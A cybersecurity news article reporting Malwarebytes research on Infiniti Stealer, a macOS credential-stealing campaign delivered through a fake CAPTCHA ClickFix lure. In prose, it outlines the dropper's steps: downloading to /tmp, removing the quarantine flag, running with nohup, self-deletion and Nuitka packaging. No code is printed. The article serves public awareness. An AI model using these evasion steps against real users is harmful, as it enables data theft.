Researchers warn that macOS users face browser credential-stealing attack

Published: 30 March 2026
MacOS malware
Image by Cybernews

A newly identified macOS malware campaign is showing how techniques that worked on Windows – like ClickFix – are now being adapted to target Mac users.

Malwarebytes researchers first tracked the threat under the temporary name “NukeChain” but later uncovered an exposed operator that revealed its actual name: Infiniti Stealer.

jurgita justinasv Izabelė Pukėnaitė vilius Ernestas Naprys Gintaras Radauskas
Don't miss our latest stories on Google News
Google News Follow us
ADVERTISEMENT

The malware is built to harvest sensitive information from Macs, including browser credentials, Keychain data, cryptocurrency wallet information, developer secrets stored in files like .env, and even screenshots.

The process starts with a fake verification page hosted at update-check[.]com, which is designed to resemble a human-proving Cloudflare CAPTCHA.

Instead of exploiting a software flaw, the campaign uses a ClickFix con, instructing users to open Terminal (a built-in macOS app that lets you control your computer by typing commands) and paste a command manually.

NukechainCaptcha
Cloudflare CAPTCHA tricks users into pasting malicious code in Terminal. Image: Malwarebytes

Once the command is run, a small malicious script (a “Bash dropper”) immediately launches the infection process. First, it downloads the actual malware from the internet and saves it onto the Mac in a temporary folder /tmp.

Then it removes Apple’s built-in safety warning (the quarantine flag), so the system does not treat the file as suspicious.

Next, it runs the malware in the background using a command called nohup, which lets it keep running even if the Terminal window is closed.

It also covertly passes instructions to the malware, such as where to send stolen data, using hidden settings (“Environment variables”).

ADVERTISEMENT

Finally, it covers its tracks by deleting the script that started everything and automatically closing the Terminal window, so the user doesn’t see what just happened.

Check if your data has been leaked

Find out if your email, phone number or related personal information might have fallen into the wrong hands.
18,611,353,922
Breached accounts
36,030
Breached websites

The second stage of the attack uses a tool called Nuitka, which changes how the malware is packaged so that, rather than looking like code, it resembles a normal Mac program.

This makes it much harder for security tools and researchers to detect, because they can’t just open it and read what it does. It also blends in better with legitimate software, making it harder to spot and analyze.

Malwarebytes claims that the campaign is the first macOS campaign of its type that combines “ClickFix delivery with a Nuitka-compiled Python stealer.”

The team reminds users not to paste commands into Terminal from websites, as “no legitimate CAPTCHA requires this.”

Unlock more exclusive Cybernews content on YouTube

ADVERTISEMENT
Share
Post
Share
Share
Share
More from Cybernews
Companies using Fable 5 beware: it’s collecting your data, and there are no exceptions
World’s leading mathematicians ridicule AI hype in high-IQ declaration
Democrats are far more worried than Republicans that AI will take jobs, new poll finds
Europe’s tech revolution feels like Soviet déjà vu
New York demands advertisers use “synthetic performer” label or else
The surprising way Elon Musk is powering your next holiday flight
ADVERTISEMENT